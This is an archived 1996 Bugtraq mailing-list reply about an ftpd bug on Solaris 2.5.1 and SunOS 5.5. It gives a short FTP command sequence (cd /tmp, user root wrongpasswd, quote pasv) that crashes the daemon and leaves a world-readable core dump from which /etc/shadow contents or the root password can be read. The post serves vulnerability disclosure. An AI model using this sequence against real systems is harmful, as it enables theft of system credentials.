Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1996_4

Bugtraq archives for 4th quarter (Oct-Dec) 1996: Re: ftpd bug? Was: bin/1805: Bug in ftpd

Re: ftpd bug? Was: bin/1805: Bug in ftpd

James Poland 6-5251 (polandcam2.gsfc.nasa.gov)
Wed, 16 Oct 1996 08:52:57 -0400

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Erik Fichtner: "Re: BoS: Re: ftpd bug? Was: bin/1805: Bug in ftpd"
Previous message: Jonny Llama: "Re: ftpd bug? Was: bin/1805: Bug in ftpd"

Martin's method works for Solaris 2.5.1 as well. 'strings' on the core file
reveals the complete contents of /etc/shadow. This is not good. To reiterate,
if someone else is running an ftp session on host_a, start your own ftp
session with host_a. Then issue the commands
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

Examine the resulting core file with the strings command.

This method does not work with Solaris 2.4.

>
> James Poland 6-5251 wrote:
> >
> > On Solaris 2.5.1, the core file contains only the user's password in
> > cleartext. How hard is it to crash someone else's ftp session?
>
> Killing from the command line doesn't seem to work, but:
>
> SunOS 5.5:
>
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
> -Martin
>
> PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
>     so the seem to have used the proposed fix
>
>          Checking for "pw != NULL"
>
>     So this proposal was simple and obvious   ... and incomplete. :)
>

Next message: Erik Fichtner: "Re: BoS: Re: ftpd bug? Was: bin/1805: Bug in ftpd"
Previous message: Jonny Llama: "Re: ftpd bug? Was: bin/1805: Bug in ftpd"